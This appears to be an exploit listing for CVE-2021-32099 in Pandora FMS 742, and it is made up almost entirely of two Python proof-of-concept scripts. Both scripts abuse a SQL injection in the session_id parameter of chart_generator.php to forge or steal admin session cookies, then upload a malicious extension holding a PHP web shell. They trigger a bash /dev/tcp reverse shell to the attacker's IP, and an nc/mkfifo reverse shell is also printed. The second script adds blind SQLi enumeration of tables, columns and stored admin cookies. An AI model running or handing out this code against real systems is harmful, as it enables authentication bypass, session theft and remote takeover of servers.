A SQL injection vulnerability in the pandora_console component of Artica Pandora FMS 742 allows an unauthenticated attacker to upgrade his unprivileged session via the /include/chart_generator.php session_id parameter, leading to a login bypass
#!/usr/bin/env python3from colorama import Fore, Stylefrom pwn import *import requestsimport sysimport osimport signalimport argparseimport threadingdef sigIntHandler(sig: signal.Signals, frame: types.FrameType | None) -> None: """ Function to handle SIGINT Signals - Print Information - Reset SIGINT Handler - Send a SIGINT Signal to the current Process instead of sys.exit()(WRONG!!) """ print('\n') p = log.progress(Fore.CYAN + "Interruption" + Style.RESET_ALL) p.status(Fore.MAGENTA + f"SIGINT Signal sent to {sys.argv[0]}. {Fore.RED}Exiting... ⌛" + Style.RESET_ALL) time.sleep(1) signal.signal(signal.SIGINT, signal.SIG_DFL) os.killpg(os.getpid(), signal.SIGINT)def banner() -> str: return f'''{Fore.GREEN} ______ ______ ___ ___ ___ ___ ____ ___ ___ ___ ___ / ___/ | / / __/___|_ |/ _ \|_ < /___|_ /|_ |/ _ \/ _ \/ _ | / /__ | |/ / _//___/ __// // / __// /___//_ </ __// // /\_, /\_, / \___/ |___/___/ /____/\___/____/_/ /____/____/\___//___//___/ {Style.RESET_ALL}'''def revShellWarning(ip, port) -> str: return f'''{Fore.MAGENTA}[!] {Fore.RED}The Reverse Shell obtained is not associated with a stable TTY/PTY ❗{Fore.MAGENTA}[+] {Fore.BLUE}Try to stablish another reverse connection as follows → {Fore.CYAN}[*] {Fore.MAGENTA}bash -c "bash -i &> /dev/tcp/{ip}/{int(port) + 1} 0>&1 {Fore.CYAN}[*] {Fore.MAGENTA}rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {ip} {int(port) + 1} >/tmp/f{Style.RESET_ALL} '''class Exploit: def __init__(self, url, ip, port): self.url = url.strip('/') self.ip = ip self.port = port self.session = requests.Session() self.file = 'shell.zip' self.payload = f'bash -c "bash -i %26> /dev/tcp/{self.ip}/{self.port} 0>%261"' def generateAdminCookie(self): """ This method is the main entry point. It performs a SQL Injection by entering the below query as the value of the session_id parameter, which is not propertly sanitized The PHPSESSID Admin Cookie is stored in the HTTP Session for later use """ sqli_url = self.url + "/include/chart_generator.php" print() p = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL) p.status(Fore.MAGENTA + "Generating the Admin Cookie ⌛..." + Style.RESET_ALL) try: r = self.session.get( sqli_url + f"?session_id='+UNION+SELECT+1,2,'id_usuario|s:5:%22admin%22;'+--+-" ) if "Pandora FMS Graph ( - )" in r.text: p.success(Fore.GREEN + "Admin Cookie 🍪 generated successfully ✔" + Style.RESET_ALL) print( Fore.MAGENTA + f"\n[+] {Fore.YELLOW}Admin Cookie ➜ " + Fore.MAGENTA + r.cookies.get('PHPSESSID') + Style.RESET_ALL ) return True else: p.failure(Fore.RED + "The Admin Cookie 🍪 could not be generated ❌" + Style.RESET_ALL) return False except requests.RequestException as e: print(Fore.RED + f"" + Style.RESET_ALL) sys.exit(1) def uploadMaliciousExtension(self) -> None: """ This method, being authenticated as a Pandora Admin user, uploads a malicious extension which allows an attacker, later on, to execute arbitrary commands by a PHP web shell It sends a POST Request to upload the extension using the previously extracted admin cookie """ print() p = log.progress(Fore.CYAN + "Pandora Extension 💀" + Style.RESET_ALL) p.status(Fore.MAGENTA + "Uploading the malicious extension ⌛..." + Style.RESET_ALL) time.sleep(1) upload_url = self.url + "/index.php?sec=godmode/extensions&sec2=extensions/extension_uploader" post_data = { 'upload' : '1', 'submit' : 'Upload' } with open(self.file, "rb") as f: files = { 'extension' : (self.file, f.read(), 'application/zip') } try: r = self.session.post(upload_url, files=files, data=post_data) if "Extension uploaded successfully" in r.text: p.success(Fore.GREEN + "Extension uploaded successfully ✔" + Style.RESET_ALL) return True else: p.failure(Fore.RED + "Something went wrong trying to upload the extension ❌" + Style.RESET_ALL) return False except requests.RequestException as e: print(Fore.RED + f"Error: {e}" + Style.RESET_ALL) sys.exit() def setListener(self) -> None: """ This Method, executed by a thread, carries out the following actions: - Set a Listen Socket in the specified TCP/IP Stack - Wait a Remote Connection (From the Payload sent) - Stablish a Connection and receives a Reverse Shell from the Target """ print() p = log.progress(Fore.CYAN + "Socket ⚙" + Style.RESET_ALL) p.status(Fore.MAGENTA + f"Waiting for connection on {self.ip}:{self.port} ⌛..." + Style.RESET_ALL) time.sleep(1) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((self.ip, int(self.port))) s.listen(1) conn, addr = s.accept() p.success(Fore.GREEN + f"Connection received from {addr[0]}:{addr[1]} ✔" + Style.RESET_ALL) print(revShellWarning(self.ip, self.port)) print(Fore.RED + f'[+] {Fore.YELLOW}Press [Enter] to get the Reverse Shell' + Style.RESET_ALL) print(Fore.RED + f'\n[+] {Fore.YELLOW}Press C-c or type "exit" to quit the Shell\n' + Style.RESET_ALL) print(conn.recv(4096).decode(), end='') while True: cmd = input() if cmd == "exit": break conn.send((cmd + '\n').encode()) time.sleep(1) print(conn.recv(4096).decode(), end='') def getReverseShell(self) -> None: """ This method performs an HTTP GET Request to the loaded extension to send a reverse shell to the listening socket through a PHP web shell """ print() p = log.progress(Fore.CYAN + "Rev Shell 🐉" + Style.RESET_ALL) p.status(Fore.MAGENTA + "Getting the reverse shell ⌛..." + Style.RESET_ALL) time.sleep(1) extension_url = self.url + "/extensions/shell.php" try: r = self.session.get(extension_url + f'?cmd={self.payload}') if r.status_code == 200: p.success(Fore.GREEN + "Reverse Shell send correctly ✔" + Style.RESET_ALL) return True else: p.failure(Fore.RED + "Could not send the reverse shell ❌" + Style.RESET_ALL) return False except requests.RequestException as e: print(Fore.RED + f"Error: {e}" + Style.RESET_ALL) sys.exit(1) def runExploit(self) -> None: """ Method which executes the other instance methods """ self.uploadMaliciousExtension() if self.generateAdminCookie() else exit(1) lthread = threading.Thread(target=self.setListener) lthread.start() time.sleep(1) self.getReverseShell() lthread.join()def main() -> None: print(banner()) signal.signal(signal.SIGINT, sigIntHandler) parser = argparse.ArgumentParser( description=Fore.MAGENTA + "CVE-2021-32099 PoC" + Style.RESET_ALL ) parser.add_argument('url', help='Pandora Console URL e.g. http://localhost:8080/pandora_console') parser.add_argument('ip', help='Attacker IP Address') parser.add_argument('lport', help='Attacker Listening Port') opts = parser.parse_args() if any(not opt for opt in (opts.url, opts.ip, opts.lport)): parser.print_help() sys.exit(1) exploit = Exploit(opts.url, opts.ip, opts.lport) exploit.runExploit()if __name__ == '__main__': main()
Extended Exploit
#!/usr/bin/env python3from pwn import *from colorama import Fore, Styleimport requestsimport threadingimport socketimport stringimport osimport sysimport argparseimport signalimport timedef sigintHandler(sig, term) -> None: """ Function to handle SIGINT Signals - Print Information - Reset SIGINT Handler - Send a SIGINT Signal to the current Process instead of sys.exit()(WRONG!!) """ print("\n") p = log.progress(Fore.CYAN + 'Exit' + Style.RESET_ALL) p.status(Fore.MAGENTA + "SIGINT signal sent to the current process. Exiting... ⏳" + Style.RESET_ALL) time.sleep(1) signal.signal(signal.SIGINT, signal.SIG_DFL) os.killpg(os.getpid(), signal.SIGINT)def banner() -> str: return f'''{Fore.GREEN} ______ ______ ___ ___ ___ ___ ____ ___ ___ ___ ___ / ___/ | / / __/___|_ |/ _ \|_ < /___|_ /|_ |/ _ \/ _ \/ _ | / /__ | |/ / _//___/ __// // / __// /___//_ </ __// // /\_, /\_, / \___/ |___/___/ /____/\___/____/_/ /____/____/\___//___//___/ {Style.RESET_ALL}'''def revShellWarning(ip: str, port: int) -> None: return f'''{Fore.MAGENTA}[!] {Fore.RED}The Reverse Shell obtained is not associated with a stable TTY/PTY ❗{Fore.MAGENTA}[ℹ] {Fore.BLUE}Try to stablish another reverse connection as follows → {Fore.CYAN}[*] {Fore.MAGENTA}bash -c "bash -i &> /dev/tcp/{ip}/{int(port) + 1} 0>&1 {Fore.CYAN}[*] {Fore.MAGENTA}rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {ip} {int(port) + 1} >/tmp/f{Style.RESET_ALL} '''class SQLInjection(): def __init__(self, url: str) -> str: self.url = url.strip('/') + '/include/chart_generator.php' self.chars = string.ascii_letters + string.digits + '-_' self.session = requests.Session() self.db_length = '' self.database = '' self.table = '' self.columns_length = '' self.adminCookie_length = '' self.admin_cookie = '' self.ACCESS_DENIED_MSG = "Access denied" def makeSQLQuery(self, query: str) -> requests.Response: """ This method sends an HTTP GET Requests with the URL Parameters passed as arguments related to the SQLi Injection """ try: return self.session.get(self.url + query) except requests.RequestException as e: print(Fore.RED + f"Error: {e}" + Style.RESET_ALL) sys.exit(1) def getDBLength(self) -> int: """ This method extracts the current DB Name Length used by the Web Application and returns the specific number for other methods of the same instance """ print() p1 = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL) p1.status(Fore.MAGENTA + "Extracting Current DB Name Length... ⏳" + Style.RESET_ALL) time.sleep(1) print() p2 = log.progress(Fore.GREEN + "Length" + Style.RESET_ALL) for number in range(1,20): r = self.makeSQLQuery(f"?session_id='+or+IF(LENGTH(database())={number},1,0)--+-") p2.status(Fore.CYAN + str(number) + Style.RESET_ALL) if self.ACCESS_DENIED_MSG not in r.text: p2.success(Fore.RED + str(number) + Style.RESET_ALL) p1.success(Fore.GREEN + "Current DB Length extracted ✔" + Style.RESET_ALL) return number def getDBName(self) -> None: """ This method lists the current Database Name used by the Web Application according to its length """ self.db_length = self.getDBLength() print() p1 = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL) p1.status(Fore.MAGENTA + "Enumerating DB Name... ⏳" + Style.RESET_ALL) time.sleep(1) print() p2 = log.progress(Fore.GREEN + "Database" + Style.RESET_ALL) for position in range(1, self.db_length + 1): for char in self.chars: r = self.makeSQLQuery(f"?session_id='+or+IF(SUBSTR((select+database()),{position},1)='{char}',1,0)+--+-") p2.status(Fore.RED + self.database + char + Style.RESET_ALL) if self.ACCESS_DENIED_MSG not in r.text: self.database += char break p2.success(Fore.RED + self.database + Style.RESET_ALL) p1.success(Fore.GREEN + "Current DB Name extracted ✔" + Style.RESET_ALL) def getDBTables(self) -> None: """ This method carries out an enumeration of the current database's tables The user can exit the extraction pressing C-c It will ask for the name of the database table to list its columns """ self.getDBName() signal.signal(signal.SIGINT, signal.default_int_handler) tables = '' print() p = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL) p.status(Fore.MAGENTA + f"Extracting {self.database} DB Tables Names... ⏳" + Style.RESET_ALL) time.sleep(2) p.status(Fore.MAGENTA + f"{Fore.YELLOW}Press C-c to leave the DB Table Extraction Mode" + Style.RESET_ALL) print( Fore.MAGENTA + f"\n[+] {Fore.CYAN}{self.database} DB Tables:", Fore.GREEN + "\n\n\t[*] " + Style.RESET_ALL, end='' ) try: for position in range(1,2800): for char in self.chars + ',': r = self.session.get( self.url + f"?session_id='+or+IF(SUBSTR((SELECT+GROUP_CONCAT(table_name)+FROM+information_schema.tables+WHERE+table_schema='{self.database}'),{position},1)='{char}',0,1)+--+-" ) if self.ACCESS_DENIED_MSG in r.text: print(Fore.GREEN + "\n\t[*] " + Style.RESET_ALL, end='') if char == ',' else print(Fore.CYAN + char + Style.RESET_ALL, end='') break except KeyboardInterrupt: p.failure(Fore.RED + "Exiting... ⌛" + Style.RESET_ALL) time.sleep(1) p.success(Fore.GREEN + "Finished extracted DB Tables ✔" + Style.RESET_ALL) self.table = input(Fore.MAGENTA + f"\n\n[+] {Fore.YELLOW}Enter a DB Table to get its columns: " + Style.RESET_ALL) def getDBColumnsLength(self) -> int: """ This method gets the total length of all columns of a given table """ signal.signal(signal.SIGINT, sigintHandler) print() p1 = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL) p1.status(Fore.MAGENTA + "Extracting Total Length of All Columns... ⏳" + Style.RESET_ALL) time.sleep(1) print() p2 = log.progress(Fore.CYAN + f"{self.table} columns' length" + Style.RESET_ALL) for number in range(1,200): r = self.makeSQLQuery(f"?session_id='+OR+IF(LENGTH((SELECT+GROUP_CONCAT(column_name)+FROM+information_schema.columns+WHERE+table_schema='{self.database}'+AND+table_name='{self.table}'))='{number}',0,1)+--+-") p2.status(Fore.RED + str(number) + Style.RESET_ALL) if self.ACCESS_DENIED_MSG in r.text: p2.success(Fore.GREEN + str(number) + Style.RESET_ALL) p1.success(Fore.GREEN + f"Total Length of all Columns extracted for {self.table} ✔" + Style.RESET_ALL) return number def getDBTableColumns(self) -> str: """ This method performs a enumeration of the columns of a given DB Table It returns a list with the columns """ self.columns_length = self.getDBColumnsLength() columns = '' print() p1 = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL) p1.status(Fore.MAGENTA + f"Extracting Columns for {self.table} DB Table... ⏳" + Style.RESET_ALL) time.sleep(1) print() p2 = log.progress(Fore.GREEN + "Columns" + Style.RESET_ALL) for position in range(1, self.columns_length + 1): for char in self.chars + ',': r = self.makeSQLQuery(f"?session_id='+or+IF(SUBSTR((SELECT+GROUP_CONCAT(column_name)+FROM+information_schema.columns+WHERE+table_schema='{self.database}'+and+table_name='{self.table}'),{position},1)='{char}',0,1)+--+-") p2.status(Fore.CYAN + columns + char + Style.RESET_ALL) if self.ACCESS_DENIED_MSG in r.text: columns += char if char != ',' else char + ' ' break p2.success(Fore.GREEN + f"{columns}" + Style.RESET_ALL) p1.success(Fore.GREEN + f"Columns of {self.table} extracted ✔" + Style.RESET_ALL) return [ column.strip() for column in columns.split(',') ] def generateAdminCookie(self) -> None: """ This method is the main entry point. It performs a SQL Injection by entering the below query as the value of the session_id parameter, which is not propertly sanitized as we can in the previous methods It creates an instance attribute containing the value of the cookie Note that this method will only be called if there are no admin cookies stored in the database """ print() p = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL) p.status(Fore.MAGENTA + "Generating Admin Cookie ⌛..." + Style.RESET_ALL) time.sleep(1) r = self.makeSQLQuery("?session_id='+UNION+SELECT+1,2,'id_usuario|s:5:%22admin%22;'+--+-") if "Pandora FMS Graph ( - )" in r.text: p.success(Fore.GREEN + "Admin Cookie 🍪 generated successfully ✓" + Style.RESET_ALL) self.admin_cookie = r.cookies.get('PHPSESSID') else: p.failure(Fore.RED + "Something went wrong trying to generate an Admin Cookie ❌" + Style.RESET_ALL) sys.exit(1) def getAdminCookieNumber(self) -> None: """ This method extracts the number of admin cookies stored in the database """ print() p1 = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL) p1.status(Fore.MAGENTA + "Checking if there is any Admin Cookie ⏳..." + Style.RESET_ALL) time.sleep(1) print() p2 = log.progress(Fore.CYAN + "Admin Cookie[s] Number" + Style.RESET_ALL) for number in range(0,21): r = self.makeSQLQuery(f"?session_id='+OR+IF((SELECT+COUNT(*)+FROM+{self.table}+WHERE+data+LIKE+'%25admin%25')={number},0,1)+--+-") p2.status(Fore.MAGENTA + str(number) + Style.RESET_ALL) if self.ACCESS_DENIED_MSG in r.text and number != 0: p2.success(Fore.GREEN + str(number) + Style.RESET_ALL) p1.success(Fore.GREEN + "Number of Admin Cookies 🍪 extracted ✔" + Style.RESET_ALL) return True p2.failure(Fore.RED + "0" + Style.RESET_ALL) p1.failure(Fore.RED + "There is no Admin Cookie 🍪" + Style.RESET_ALL) return False def getAdminCookieLength(self) -> None: """ This method obtains the total lenght of all Admin Cookies stored in the database and returns and set this value as an attribute of the object """ print() p1 = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL) p1.status(Fore.MAGENTA + "Extracting Admin Cookie[s] 🍪 length... ⏳" + Style.RESET_ALL) time.sleep(1) print() p2 = log.progress(Fore.CYAN + "Admin Cookie[s] Length" + Style.RESET_ALL) for number in range(1, 800): r = self.makeSQLQuery(f"?session_id='+OR+IF(LENGTH((SELECT+GROUP_CONCAT(id_session)+FROM+{self.table}+where+data+like+'%25admin%25'))={number},0,1)+--+-") p2.status(Fore.RED + str(number) + Style.RESET_ALL) if self.ACCESS_DENIED_MSG in r.text: p2.success(Fore.GREEN + str(number) + Style.RESET_ALL) p1.success(Fore.GREEN + "Admin Cookie[s] length extracted ✔" + Style.RESET_ALL) self.adminCookie_length = number break def getAdminCookie(self) -> None: """ This method extracts the admin Cookies stored in the database It will only be called if there are any admin cookies stored in the database """ print() p1 = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL) p1.status(Fore.MAGENTA + f"Extracting Cookies Admin 🍪 from id_session column... ⌛" + Style.RESET_ALL) time.sleep(1) print() p2 = log.progress(Fore.CYAN + "Admin Cookie[s] 🍪" + Style.RESET_ALL) for position in range(1, self.adminCookie_length + 1): for char in self.chars + ',': r = self.makeSQLQuery(f"?session_id='+OR+IF(SUBSTR((SELECT+GROUP_CONCAT(id_session)+FROM+{self.table}+WHERE+data+like+'%25admin%25'),{position},1)='{char}',0,1)+--+-") p2.status(Fore.RED + self.admin_cookie + char + Style.RESET_ALL) if self.ACCESS_DENIED_MSG in r.text: self.admin_cookie += char if char != ',' else char + ' ' break p2.success(Fore.GREEN + f"{self.admin_cookie}" + Style.RESET_ALL) p1.success(Fore.GREEN + "Admin Cookie[s] extracted ✔" + Style.RESET_ALL) def runSQLInjection(self) -> None: self.getDBTables() self.getDBTableColumns() if not self.getAdminCookieNumber(): self.generateAdminCookie() else: self.getAdminCookieLength() self.getAdminCookie() return [ cookie.strip() for cookie in self.admin_cookie.split(',') ]class Shell(): def __init__(self, url: str, ip: str, port: int, cookie: str) -> None: self.url = url.strip('/') self.ip = ip self.port = port self.cookie = cookie self.file = "shell.zip" self.payload = f'bash -c "bash -i %26> /dev/tcp/{self.ip}/{self.port} 0>%261"' def uploadMaliciousExtension(self) -> None: """ This method, being authenticated as a Pandora Admin user, uploads a malicious extension which allows an attacker, later on, to execute arbitrary commands by a PHP web shell It sends a POST Request to upload the extension using the previously extracted admin cookie """ upload_url = self.url + '/index.php?sec=godmode/extensions&sec2=extensions/extension_uploader' cookies = { 'PHPSESSID' : self.cookie } data = { "upload" : "1", "submit" : "Upload" } with open(self.file, "rb") as f: files = { 'extension' : (self.file, f.read(), 'application/zip') } print() p = log.progress(Fore.CYAN + "Pandora Extension" + Style.RESET_ALL) p.status(Fore.MAGENTA + "Uploading malicious extension... ⌛" + Style.RESET_ALL) time.sleep(1) try: r = requests.post(upload_url, data=data, cookies=cookies, files=files) if "Extension uploaded successfully" in r.text: p.success(Fore.GREEN + "Extension uploaded successfully ✔" + Style.RESET_ALL) return True else: p.failure(Fore.RED + "Something went wrong trying to upload the malicious extension ❌" + Style.RESET_ALL) return False except Exception as e: print(Fore.RED + f"Error: {e}" + Style.RESET_ALL) sys.exit(1) def setListener(self) -> None: """ This Method, executed by a thread, carries out the following actions: - Set a Listen Socket in the specified TCP/IP Stack - Wait a Remote Connection (From the Payload sent) - Stablish a Connection and receives a Reverse Shell from the Target """ print() p = log.progress(Fore.CYAN + "Socket" + Style.RESET_ALL) p.status(Fore.MAGENTA + f"Setting up a listener on {self.ip}:{self.port} ⌛..." + Style.RESET_ALL) time.sleep(1) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((self.ip, int(self.port))) s.listen(1) conn, addr = s.accept() p.status(Fore.GREEN + f"Connection received from {addr[0]}:{addr[1]}. Press [Enter] to get the Shell" + Style.RESET_ALL) print(Fore.MAGENTA + f"[+] {Fore.YELLOW}Press Enter to get the shell" + Style.RESET_ALL) print(Fore.MAGENTA + f"\n[+] {Fore.YELLOW}Press C-c or type \"exit\" to leave the shell\n" + Style.RESET_ALL) print(conn.recv(4096).decode(), end='') while True: cmd = input() if cmd != "exit": conn.send((cmd + '\n').encode()) time.sleep(1) print(conn.recv(4096).decode(), end='') else: p.failure(Fore.RED + "Socket closed ✔" + Style.RESET_ALL) break def getReverseShell(self) -> None: """ This method performs an HTTP GET Request to the loaded extension to send a reverse shell to the listening socket """ extension_url = self.url + '/extensions/shell.php' print() p = log.progress(Fore.CYAN + "Reverse Shell" + Style.RESET_ALL) p.status(Fore.MAGENTA + f"Sending the Reverse shell to {self.ip}:{self.port}... ⌛" + Style.RESET_ALL) time.sleep(1) print(revShellWarning(self.ip, self.port)) try: r = requests.get(extension_url + f'?cmd={self.payload}') if r.status_code == 200: p.success(Fore.GREEN + f"Reverse Shell sent correctly to {self.ip}:{self.port} ✔" + Style.RESET_ALL) return True else: p.failure(Fore.RED + "Something went wrong trying to send the reverse shell ❌" + Style.RESET_ALL) return False except Exception as e: print(Fore.RED + f"Error: {e}" + Style.RESET_ALL) sys.exit(1) def runShell(self) -> None: exit(99) if not self.cookie else None if self.uploadMaliciousExtension(): lthread = threading.Thread(target=self.setListener) lthread.start() time.sleep(2) self.getReverseShell() lthread.join()def main() -> None: print(banner()) signal.signal(signal.SIGINT, sigintHandler) parser = argparse.ArgumentParser( description=Fore.MAGENTA + "SQLi to exploit Pandora FMS 7.0" + Style.RESET_ALL ) parser.add_argument('url', help="Pandora FMS Console URL e.g. http://domain.tld/pandora_console") parser.add_argument('ip', help="Attacker IP Address") parser.add_argument('port', help="Attacker Listening Port") opts = parser.parse_args() if any(not opt for opt in (opts.url, opts.ip, opts.port)): parser.print_help() sys.exit(1) sqli = SQLInjection(opts.url) admin_cookie = sqli.runSQLInjection() shell = Shell(opts.url, opts.ip, opts.port, admin_cookie[0]) shell.runShell()if __name__ == '__main__': main()